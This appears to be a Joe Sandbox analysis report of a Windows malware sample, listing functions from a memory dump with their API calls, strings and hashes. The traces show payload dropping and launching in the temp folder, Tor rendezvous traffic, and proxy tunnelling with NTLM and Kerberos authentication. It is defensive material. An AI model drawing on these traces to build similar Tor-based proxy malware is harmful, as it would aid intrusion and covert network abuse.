lstrlenA.KERNEL32(?), ref: 009ADD1F
memmove.MSVCRT ref: 009ADEB6

Part of subcall function 009A7190: lstrlenA.KERNEL32(?,?,?,009ADC8D,?,?,?,00000040,00000000), ref: 009A7198

memmove.MSVCRT ref: 009AE24B
memmove.MSVCRT ref: 009AE2B3
memmove.MSVCRT ref: 009AE2F7
PostQueuedCompletionStatus.KERNEL32(?,00000001,00000010,?), ref: 009AE333

Strings

, xrefs: 009ADECA
@, xrefs: 009AE0BA

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: memmove$lstrlen$CompletionCriticalEnterPostQueuedSectionStatus
String ID: $@
API String ID: 2473233352-1077428164
Opcode ID: 0f96e81cc927401d35b9173f712d2698c1ed09159be7544052381de7a9d50386
Instruction ID: e6a4023b3987e53e1a36c12ae573ed28ee07847a6e31f4e722320476fbaa4a4c
Opcode Fuzzy Hash: 0f96e81cc927401d35b9173f712d2698c1ed09159be7544052381de7a9d50386
Instruction Fuzzy Hash: 2C225270F05129AFDB2ADB15DCA1AA9B7BABB51304F04C5E9D0095B381DB369F85CF80

Uniqueness

Uniqueness Score: -1.00%

Function 009B11E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94sleepfileCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,?,?,?), ref: 009B1245
rand.MSVCRT ref: 009B126E
rand.MSVCRT ref: 009B1282
wsprintfW.USER32 ref: 009B12A9

Part of subcall function 009B1130: CreateFileW.KERNEL32(00000001,C0000000,?,00000000,00000000,?,00000000,?,00000002,00000001,00000080), ref: 009B1153
Part of subcall function 009B1130: SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 009B116C
Part of subcall function 009B1130: WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 009B1198
Part of subcall function 009B1130: CloseHandle.KERNEL32(000000FF), ref: 009B11CD

Sleep.KERNEL32(000003E8), ref: 009B12ED

Part of subcall function 009AFE60: CryptImportKey.ADVAPI32(015379A0,009B5940,00000214,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009B0750), ref: 009AFE8A
Part of subcall function 009AFE60: CreateFileW.KERNEL32(009B0750,C0000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,009B0750), ref: 009AFEAB
Part of subcall function 009AFE60: GetFileSize.KERNEL32(000000FF,00000000), ref: 009AFEC4
Part of subcall function 009AFE60: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 009AFEE5
Part of subcall function 009AFE60: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 009AFF04
Part of subcall function 009AFE60: CryptCreateHash.ADVAPI32(015379A0,00008004,00000000,00000000,?), ref: 009AFF56
Part of subcall function 009AFE60: GetProcessHeap.KERNEL32(00000000,00000000), ref: 009AFF8D
Part of subcall function 009AFE60: HeapAlloc.KERNEL32(00000000), ref: 009AFF94

Sleep.KERNEL32(000003E8), ref: 009B130E

Part of subcall function 009B0080: memset.MSVCRT ref: 009B008E
Part of subcall function 009B0080: memset.MSVCRT ref: 009B009E
Part of subcall function 009B0080: CreateProcessW.KERNELBASE(00000000,009B0771,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 009B00D7
Part of subcall function 009B0080: Sleep.KERNELBASE(000003E8), ref: 009B00E7

DeleteFileW.KERNEL32(?), ref: 009B132C

Strings

%ls\%d%d.exe, xrefs: 009B129D

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: File$Create$Sleep$CryptHeapProcessmemsetrand$AllocCloseDeleteHandleHashImportMappingPathPointerSizeTempViewWritewsprintf
String ID: %ls\%d%d.exe
API String ID: 1034425663-165811362
Opcode ID: 7f608b59313050fe621189b1033661d5b0de664089c899bb27d49bf7d44bc00e
Instruction ID: 1a30c48795cbf461743e3830c40f51dc4212d74eb5b463aad7c1762e2812063f
Opcode Fuzzy Hash: 7f608b59313050fe621189b1033661d5b0de664089c899bb27d49bf7d44bc00e
Instruction Fuzzy Hash: 5A3126B1A0021D9BCB10EB54DD99FEE73B9BF88314F804598F60D96181EA34AE80CF65

Uniqueness

Uniqueness Score: -1.00%

Function 009A837B Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 292COMMON

Download Yara Rule

APIs

inet_ntop.WS2_32(00000002,?,?,00000080), ref: 009A83E6

Strings

s , xrefs: 009A857F
r , xrefs: 009A84B8
<, xrefs: 009A87C2
p , xrefs: 009A854B
r , xrefs: 009A84EC

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: inet_ntop
String ID: p $r $r $s $<
API String ID: 448242623-3079122765
Opcode ID: e8062f011a07f8168f02d68d9fea683a2c4ce82a49656b52e4b56a59eeee229d
Instruction ID: ee75ffdb818e763d7030fd1c18c1a993d4cb38ce0686220c5352f1ed408651be
Opcode Fuzzy Hash: e8062f011a07f8168f02d68d9fea683a2c4ce82a49656b52e4b56a59eeee229d
Instruction Fuzzy Hash: B8D15B719142699FDF24CBA4CD44FFAB7B9BF49300F0085DAE609A6291DB749E84CF60

Uniqueness

Uniqueness Score: -1.00%

Function 009AB110 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 158COMMON

Download Yara Rule

APIs

Part of subcall function 009A3330: HeapAlloc.KERNEL32(00000000,00000008,?), ref: 009A3370
Part of subcall function 009A3330: HeapReAlloc.KERNEL32(00000000,00000008,00000000,?), ref: 009A338E
Part of subcall function 009A3330: Sleep.KERNEL32(000007D0), ref: 009A33A2

memmove.MSVCRT ref: 009AB14F
memmove.MSVCRT ref: 009AB16D
memmove.MSVCRT ref: 009AB1A2

Part of subcall function 009A23C0: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000040,00000000,?,00000000,00000000,?,009AB263,?,00000000,00000056,00000080), ref: 009A23E2

memmove.MSVCRT ref: 009AB22A
memmove.MSVCRT ref: 009AB241
memmove.MSVCRT ref: 009AB2A7

Strings

V, xrefs: 009AB190
F, xrefs: 009AB1D1

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: memmove$AllocHeap$CryptEncryptSleep
String ID: F$V
API String ID: 3676980526-4172692743
Opcode ID: 2217d7496ca878cabe019d16de5d2704994eb085fb81a13faa4d5a4ca02b88e7
Instruction ID: a2454a5d61a34b71efd3ace3884632d80e03f65a5f91161fab14c251ee3169b4
Opcode Fuzzy Hash: 2217d7496ca878cabe019d16de5d2704994eb085fb81a13faa4d5a4ca02b88e7
Instruction Fuzzy Hash: 7C5121B6D04109ABDB04DFD8DC81FEFB779AF99300F048518F515B7242EA359A18CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 009A7650 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009A2100: memmove.MSVCRT ref: 009A210F

lstrlenA.KERNEL32(?,00000000), ref: 009A77A9

Strings

HTTP/1.0 %s, xrefs: 009A76E4
HTTP/1.0 200 OK, xrefs: 009A7669
HTTP/1.0 502 Bad Gateway, xrefs: 009A76A8
HTTP/1.0 504 Gateway Timeout, xrefs: 009A76BB
HTTP/1.0 404 Not Found, xrefs: 009A767C
HTTP/1.0 403 Forbidden, xrefs: 009A7692
HTTP/1.0 500 Internal Server Error, xrefs: 009A76CE

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: lstrlenmemmove
String ID: HTTP/1.0 %s$HTTP/1.0 200 OK$HTTP/1.0 403 Forbidden$HTTP/1.0 404 Not Found$HTTP/1.0 500 Internal Server Error$HTTP/1.0 502 Bad Gateway$HTTP/1.0 504 Gateway Timeout
API String ID: 4100021496-2506370377
Opcode ID: a30db8db2be71108799d483a234bc82c4af891ce9e83d3d5d4aa99160fb31e64
Instruction ID: 91e1f383081d9c723ac83aa026f04a50b0df87fa5ba4340c3370c3bda56e215a
Opcode Fuzzy Hash: a30db8db2be71108799d483a234bc82c4af891ce9e83d3d5d4aa99160fb31e64
Instruction Fuzzy Hash: 594178B5D1C3689EDB24DB94DC42FEDB775AB45704F0480D9E909A6282E7B01B88CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 009AA8E0 Relevance: 10.8, APIs: 7, Instructions: 294networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 009AA919
htons.WS2_32(?), ref: 009AA936
htonl.WS2_32(?), ref: 009AA993
memmove.MSVCRT ref: 009AAA02
memmove.MSVCRT ref: 009AAA39
memmove.MSVCRT ref: 009AAACC

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: memmove$htons$htonl
String ID:
API String ID: 2070112683-0
Opcode ID: 2f1bfc1e6f81d152ee38c91565afad1e609ffe7f45832dab6bc4193648bdcc29
Instruction ID: 5be7f18e563dec00dbac76d1becb0192c1f52fe2ba17c399182350b736789bd0
Opcode Fuzzy Hash: 2f1bfc1e6f81d152ee38c91565afad1e609ffe7f45832dab6bc4193648bdcc29
Instruction Fuzzy Hash: F8D1BA70E0819A8BDB04CB94C594AFEB7F6AF42305F2881A9D4957B242C3755F84DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 009AC6A0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

Part of subcall function 009A35D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,009B403F,00000001,?,009B3F8F,-00000007,?,009AEEB2,-00000053,?,009AEE82,-00804C3B,?,009AED83), ref: 009A35DB

shutdown.WS2_32(?,00000001), ref: 009AC78B
shutdown.WS2_32(?,?), ref: 009AC7B8
shutdown.WS2_32(?,00000002), ref: 009AC7F2
shutdown.WS2_32(?,00000002), ref: 009AC804

Strings

502 Bad Gateway, xrefs: 009AC75C
CONNECT, xrefs: 009AC718

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: shutdown$CriticalEnterSection
String ID: 502 Bad Gateway$CONNECT
API String ID: 2480472672-1541487254
Opcode ID: 205c0c5bd39437a938730ab39347d3985d79b643035892e18429331c946bb765
Instruction ID: 7e1d752ee954be8b8694fa01766a41eaff652e89328df38e8fe1079f4836c43d
Opcode Fuzzy Hash: 205c0c5bd39437a938730ab39347d3985d79b643035892e18429331c946bb765
Instruction Fuzzy Hash: 54717274B00245ABDB08DB65C891BBE7B75BF83315F0881A8F9859F2C3DB359A41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009B0870 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 009B0876
RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 009B08C4
RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 009B08F1
RegCloseKey.ADVAPI32(?), ref: 009B090E

Strings

NoDrives, xrefs: 009B08E8
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 009B08B7

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: CloseDrivesLogicalOpenQueryValue
String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
API String ID: 2666887985-3471754645
Opcode ID: afd961fd5284ae08c413ffa3fafb6a4cac690b99ee4b684a8b9135ba43a1bf15
Instruction ID: 78700737bd4ebaff96adda6e9a521bc8e5a955517c7c631a4444d27f544ea34b
Opcode Fuzzy Hash: afd961fd5284ae08c413ffa3fafb6a4cac690b99ee4b684a8b9135ba43a1bf15
Instruction Fuzzy Hash: E811F970E0020AABEB14DFD0CA49BFFB7B4BB48714F108148E515B7280D3B86A45CF91

Uniqueness

Uniqueness Score: -1.00%

Function 009B0370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000001,00000000,00000000,00000000), ref: 009B0387
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 009B03A6
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 009B03CF
InternetCloseHandle.WININET(00000000), ref: 009B03F8
InternetCloseHandle.WININET(00000000), ref: 009B0402

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36, xrefs: 009B0382

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: Internet$CloseHandleOpen$HttpInfoQuery
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
API String ID: 3871184103-255850170
Opcode ID: 4a5f86a675bb57e5dfd37b0e29cdd0a289267c250a9c50e0c542be8d57301adb
Instruction ID: 24df36eda5c8be764aed106aaf10978707bfeba0b0fedfa0c696009db8cf22cb
Opcode Fuzzy Hash: 4a5f86a675bb57e5dfd37b0e29cdd0a289267c250a9c50e0c542be8d57301adb
Instruction Fuzzy Hash: 54115B74A41248FBDB10DFA4CD49FEEB7B9AB44710F108588EA116B2D0C7B5AA00CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009A3E20 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000), ref: 009A3FD3

Strings

%hu, xrefs: 009A40AD
http=, xrefs: 009A3F0F
socks=, xrefs: 009A3F6B
https=, xrefs: 009A3F3D
://, xrefs: 009A400E

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: lstrlen
String ID: %hu$://$http=$https=$socks=
API String ID: 1659193697-336120641
Opcode ID: 347bcb162459364b85fcdccb832f984dc39fd941ec30c61f0ad90cf12059af41
Instruction ID: d1432125d3dcd289983d4d29b225c8ade581255b1e8117c132ee7df3a6017adb
Opcode Fuzzy Hash: 347bcb162459364b85fcdccb832f984dc39fd941ec30c61f0ad90cf12059af41
Instruction Fuzzy Hash: 12919A70A14219DFDB10CFA4C988BAEBBB5BF49304F24C498E545AB281DB759E84DFD0

Uniqueness

Uniqueness Score: -1.00%

Function 009A46D0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 192stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(-00000104), ref: 009A47C6

Part of subcall function 009A2100: memmove.MSVCRT ref: 009A210F

lstrlenA.KERNEL32(00000000), ref: 009A48E7

Strings

Kerberos , xrefs: 009A472B
Proxy-Authorization: %s %s, xrefs: 009A4889
Negotiate , xrefs: 009A4705
NTLM , xrefs: 009A4718

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: lstrlen$memmove
String ID: Kerberos $NTLM $Negotiate $Proxy-Authorization: %s %s
API String ID: 1832346882-695359478
Opcode ID: 569db95cddf88370799fb1e40ebcb89814b92018654d297b8499e75c7519f8cb
Instruction ID: 5e53fc5d9414ab6216ec1704f06a1ec44b702cc3dcf1f0bb642b473d4d665901
Opcode Fuzzy Hash: 569db95cddf88370799fb1e40ebcb89814b92018654d297b8499e75c7519f8cb
Instruction Fuzzy Hash: 4A7183B5E04249AFDB00DF98D885FEEB7B5BF89304F148158F905AB381D774AA10CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009AEA20 Relevance: 9.1, APIs: 6, Instructions: 75sleepthreadnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 009A8FD0: closesocket.WS2_32(00000000), ref: 009A8FE7
Part of subcall function 009A8FD0: WaitForSingleObject.KERNEL32(00000000,00001388,00000000,?,009AE987,00000000,00000000,00000000), ref: 009A8FF9
Part of subcall function 009A8FD0: TerminateThread.KERNEL32(00000000,00000000,?,009AE987,00000000,00000000,00000000), ref: 009A9008
Part of subcall function 009A8FD0: CloseHandle.KERNEL32(00000000,?,009AE987,00000000,00000000,00000000), ref: 009A9014

Sleep.KERNEL32(000007D0,00000000,00000001,00000001,00000000), ref: 009AEA59
CloseHandle.KERNEL32(?), ref: 009AEA70
WaitForMultipleObjects.KERNEL32(?,?,00000001,000061A8), ref: 009AEA91
TerminateThread.KERNEL32(?,00000000), ref: 009AEAC7
CloseHandle.KERNEL32(?), ref: 009AEADB
WSACleanup.WS2_32 ref: 009AEB0E

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: CloseHandle$TerminateThreadWait$CleanupMultipleObjectObjectsSingleSleepclosesocket
String ID:
API String ID: 3883441888-0
Opcode ID: 136cf4208b02c16a51384e808592711ea6ccb262d5dbeb4ab518f93c1845528c
Instruction ID: c78775856c8dc9cfcb1700a5f5c97b6819a3095268b19c68367abf05077db004
Opcode Fuzzy Hash: 136cf4208b02c16a51384e808592711ea6ccb262d5dbeb4ab518f93c1845528c
Instruction Fuzzy Hash: DB314D30A54204BFDB04EB94DD55F9EBB72BF85305F144184FA05AB3C1C6716A809BE4

Uniqueness

Uniqueness Score: -1.00%

Function 009AD2C0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

Part of subcall function 009A3B80: GetTickCount.KERNEL32 ref: 009A3B86

htonl.WS2_32(?), ref: 009AD387

Part of subcall function 009A35D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,009B403F,00000001,?,009B3F8F,-00000007,?,009AEEB2,-00000053,?,009AEE82,-00804C3B,?,009AED83), ref: 009A35DB

memcmp.MSVCRT ref: 009AD4AC
memmove.MSVCRT ref: 009AD520

Strings

P, xrefs: 009AD417
GET /tor/rendezvous2/%s HTTP/1.1Host: localAccept-Encoding: identityUser-Agent: %s, xrefs: 009AD5B4

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: CountCriticalEnterSectionTickhtonlmemcmpmemmove
String ID: GET /tor/rendezvous2/%s HTTP/1.1Host: localAccept-Encoding: identityUser-Agent: %s$P
API String ID: 495902089-332776292
Opcode ID: 2edbaefc4cd379cabc0504ff21b9093f01d09aae4da7a5ef417589d24c5e5f06
Instruction ID: 5d6c31f00e11066af83ae3193f1d36061081a0f5051fe55ad70b437a610e59bd
Opcode Fuzzy Hash: 2edbaefc4cd379cabc0504ff21b9093f01d09aae4da7a5ef417589d24c5e5f06
Instruction Fuzzy Hash: AEB1B4B4D0551A9BDB18DB98CC95BFEF3B5BF85304F0481ADE10A67282E7749A84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 009A7C30 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 194COMMON

Download Yara Rule

APIs

Part of subcall function 009A2100: memmove.MSVCRT ref: 009A210F

inet_ntop.WS2_32(00000002,?,?,00000400), ref: 009A7DBD

Strings

-----END RSA PUBLIC KEY-----, xrefs: 009A7C7C
http://%s:%hu/tor/server/fp/%s.z, xrefs: 009A7C50
router %s %s , xrefs: 009A7C66
onion-key, xrefs: 009A7C92

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: inet_ntopmemmove
String ID: -----END RSA PUBLIC KEY-----$http://%s:%hu/tor/server/fp/%s.z$onion-key$router %s %s
API String ID: 1410992348-1243584039
Opcode ID: c2f8134b12246b87a8ef986efd1bc688f7ebad4f35016056e2c126e891beaaa8
Instruction ID: f0e23894ea0432b1e773329f2fa8cf4d5bdcd68c565737dffd5d824d3b32ffbb
Opcode Fuzzy Hash: c2f8134b12246b87a8ef986efd1bc688f7ebad4f35016056e2c126e891beaaa8
Instruction Fuzzy Hash: E2818371A042189FDB24CB54CC82FE9B779BB95304F0481E9F60EAA282DB745F84CF91

Uniqueness

Uniqueness Score: -1.00%

Function 009ADEE0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 009AE24B
memmove.MSVCRT ref: 009AE2B3
memmove.MSVCRT ref: 009AE2F7
PostQueuedCompletionStatus.KERNEL32(?,00000001,00000010,?), ref: 009AE333

Strings

@, xrefs: 009ADEEF

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: memmove$CompletionPostQueuedStatus
String ID: @
API String ID: 2107774671-2766056989
Opcode ID: 9928f5939ffc78866f7b417fd44227fe06ebfbbc5418445e4f124f578bb2f7ca
Instruction ID: 524bf4aff4882d7ef1c6787f1cf607922cf226c11905cdd238c38254bdf7f8bf
Opcode Fuzzy Hash: 9928f5939ffc78866f7b417fd44227fe06ebfbbc5418445e4f124f578bb2f7ca
Instruction Fuzzy Hash: 9E815274B00129AFDB26DF15DC91BA9B7B9BF95304F0080E9E5096B381DA369F85CF80

Uniqueness

Uniqueness Score: -1.00%

